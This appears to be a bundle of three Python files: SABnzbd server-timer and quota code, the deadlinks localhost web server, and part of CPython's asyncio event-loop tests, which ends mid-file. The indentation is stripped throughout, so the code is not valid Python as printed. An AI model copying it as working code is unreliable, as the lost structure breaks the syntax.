# Each server has a dictionary entry, consisting of a list of timestamps.
# (A standalone sketch of this bookkeeping follows trigger_server below.)
@synchronized(TIMER_LOCK)
def plan_server(self, server: Server, interval: int):
"""Plan the restart of a server in 'interval' minutes"""
if cfg.no_penalties() and interval > _PENALTY_SHORT:
# Overwrite in case of no_penalties
interval = _PENALTY_SHORT
logging.debug("Set planned server resume %s in %s mins", server.host, interval)
if server.id not in self.timers:
self.timers[server.id] = []
stamp = time.time() + 60.0 * interval
self.timers[server.id].append(stamp)
if interval:
sabnzbd.Scheduler.plan_server(self.trigger_server, [server.id, stamp], interval)
@synchronized(TIMER_LOCK)
def trigger_server(self, server_id: str, timestamp: float):
"""Called by scheduler, start server if timer still valid"""
logging.debug("Trigger planned server resume for server-id %s", server_id)
if server_id in self.timers:
if timestamp in self.timers[server_id]:
del self.timers[server_id]
self.init_server(server_id, server_id)
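# Standalone sketch (not part of the class) of the timer bookkeeping used by
# plan_server() and trigger_server() above: each server id maps to a list of
# resume timestamps, and a fired timer only takes effect if its timestamp is
# still recorded, i.e. it has not been neutralized by an unblock in between.
import time

class ResumeTimers:
    def __init__(self):
        self.timers = {}

    def plan(self, server_id, interval_minutes):
        """Record a resume timestamp interval_minutes from now."""
        stamp = time.time() + 60.0 * interval_minutes
        self.timers.setdefault(server_id, []).append(stamp)
        return stamp

    def trigger(self, server_id, stamp):
        """Act only when the timestamp is still valid for this server."""
        if stamp in self.timers.get(server_id, []):
            del self.timers[server_id]
            return True
        return False

    def unblock(self, server_id):
        """Neutralize any pending timers for this server."""
        self.timers.pop(server_id, None)

# Example: t = ResumeTimers(); s = t.plan('news1', 10); t.unblock('news1');
# t.trigger('news1', s) now returns False because the timer was neutralized.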
@NzbQueueLocker
@synchronized(TIMER_LOCK)
def unblock(self, server_id: str):
# Remove timer
try:
del self.timers[server_id]
except KeyError:
pass
# Activate server if it was inactive
for server in self.servers:
if server.id == server_id and not server.active:
logging.debug("Unblock server %s", server.host)
self.init_server(server_id, server_id)
break
def unblock_all(self):
for server_id in list(self.timers):  # copy; unblock() removes entries during iteration
self.unblock(server_id)
@NzbQueueLocker
@synchronized(TIMER_LOCK)
def check_timers(self):
"""Make sure every server without a non-expired timer is active"""
# Clean expired timers
now = time.time()
kicked = []
# Create a copy so we can remove during iteration
for server_id in list(self.timers):
if not [stamp for stamp in self.timers[server_id] if stamp >= now]:
logging.debug("Forcing re-evaluation of server-id %s", server_id)
del self.timers[server_id]
self.init_server(server_id, server_id)
kicked.append(server_id)
# Activate every inactive server without an active timer
for server in self.servers:
if server.id not in self.timers:
if server.id not in kicked and not server.active:
logging.debug("Forcing activation of server %s", server.host)
self.init_server(server.id, server.id)
def update_server(self, oldserver: str, newserver: Optional[str]):
"""Update the server and make sure we trigger
the update in the loop to do housekeeping"""
self.init_server(oldserver, newserver)
self.wakeup()
@NzbQueueLocker
def wakeup(self):
"""Just rattle the semaphore"""
pass
@NzbQueueLocker
def stop(self):
"""Shutdown, wrapped so the semaphore is notified"""
self.shutdown = True
sabnzbd.notifier.send_notification("SABnzbd", T("Shutting down"), "startup")
def clues_login(text: str) -> bool:
"""Check for any "failed login" clues in the response code"""
text = text.lower()
for clue in ("username", "password", "invalid", "authen", "access denied"):
if clue in text:
return True
return False
def clues_too_many(text: str) -> bool:
"""Check for any "too many connections" clues in the response code"""
text = text.lower()
for clue in ("exceed", "connections", "too many", "threads", "limit"):
# Not 'download limit exceeded' error
if (clue in text) and ("download" not in text) and ("byte" not in text):
return True
return False
def clues_too_many_ip(text: str) -> bool:
"""Check for any "account sharing" clues in the response code"""
text = text.lower()
for clue in ("simultaneous ip", "multiple ip"):
if clue in text:
return True
return False
def clues_pay(text: str) -> bool:
"""Check for messages about payments"""
text = text.lower()
for clue in ("credits", "paym", "expired", "exceeded"):
if clue in text:
return True
return False
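# Hedged usage sketch of the clues_* heuristics above; the response strings
# are made up for illustration and each one trips the checker listed next to it.
def _demo_clues():
    samples = [
        ("502 Too many connections for your account", clues_too_many),
        ("481 Multiple IP addresses detected", clues_too_many_ip),
        ("481 Invalid username or password", clues_login),
        ("502 Your credits have expired", clues_pay),
    ]
    return [(text, checker(text)) for text, checker in samples]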
def check_server_expiration():
"""Check if user should get warning about server date expiration"""
for server in config.get_servers().values():
if server.expire_date():
days_to_expire = ceil(
(time.mktime(time.strptime(server.expire_date(), "%Y-%m-%d")) - time.time()) / (60 * 60 * 24)
)
# Notify from 5 days in advance
if days_to_expire < 6:
logging.warning(T("Server %s is expiring in %s day(s)"), server.displayname(), days_to_expire)
# Reset on the day of expiration
if days_to_expire <= 0:
server.expire_date.set("")
config.save_config()
def check_server_quota():
"""Check quota on servers"""
for srv, server in config.get_servers().items():
if server.quota():
if server.quota.get_int() + server.usage_at_start() < sabnzbd.BPSMeter.grand_total.get(srv, 0):
logging.warning(T("Server %s has used the specified quota"), server.displayname())
server.quota.set("")
config.save_config()
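# Hedged illustration (made-up numbers) of the quota comparison above: a
# server is over quota once its grand total download exceeds the configured
# quota plus the usage already recorded when the quota was set.
def _quota_example():
    quota_bytes = 50 * 1024 ** 3      # configured quota
    usage_at_start = 10 * 1024 ** 3   # usage recorded when the quota was set
    grand_total = 61 * 1024 ** 3      # bytes downloaded so far for this server
    return quota_bytes + usage_at_start < grand_total  # True: over quota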
|
simple_server.py
|
# Copyright 2019 Oleg Butuzov. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
deadlinks.simple_server
~~~~~~~~~~~~~~~~~~~~~~~
Simple threaded web server that serves a local folder over HTTP.
:copyright: (c) 2019 by Oleg Butuzov.
:license: Apache2, see LICENSE for more details.
"""
# -- Imports -------------------------------------------------------------------
from typing import (Union, Optional)
from functools import partial
try:
from socketserver import ThreadingMixIn
from http.server import HTTPServer
except ModuleNotFoundError:
from SocketServer import ThreadingMixIn # type: ignore
from BaseHTTPServer import HTTPServer # type: ignore
from socket import (socket, SOCK_STREAM, AF_INET)
from threading import Thread
from pathlib import Path
from .handler import Handler
from .router import Router
# -- Implementation ------------------------------------------------------------
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
daemon_threads = True
class SimpleServer:
def __init__(self, web_root: Union[str, Path]) -> None:
""" Starts simple webserver and handles requests to local folder. """
if not isinstance(web_root, Path):
web_root = Path(web_root)
self.router = Router(web_root.resolve())
_socket = socket(AF_INET, type=SOCK_STREAM)
_socket.bind(('localhost', 0))
self._sa = _socket.getsockname()
_socket.close()
self.start()
def start(self) -> None:
# TODO: implement a correct type annotation once
# https://github.com/python/mypy/issues/1484 is resolved
self._handler = partial(Handler, self.router)
self._server = ThreadedHTTPServer(self._sa, self._handler)
server_thread = Thread(target=self._server.serve_forever, daemon=True)
server_thread.start()
def __str__(self) -> str:
""" Instance as browsable URL. """
return self.url()
def url(self) -> str:
""" Return URL of running server (including path). """
return "http://{}:{}".format(self._sa[0], self._sa[1])
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
with self.assertWarnsRegex(
RuntimeWarning,
r"coroutine \S+ was never awaited"
):
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
                An ssl.create_default_context() replacement that doesn't
                enable certificate validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
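        # asyncio.base_events.socket is patched (see the decorator), so the
        # sockets created by create_server() are mocks; the fabricated
        # getsockbyname attribute replays one bound address per unique host.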
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
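    # SSL server helpers: _create_ssl_context() builds a server-side context
    # from the test certificate files, and the _make_ssl_* helpers start a
    # TCP or UNIX server wrapped with that context.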
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
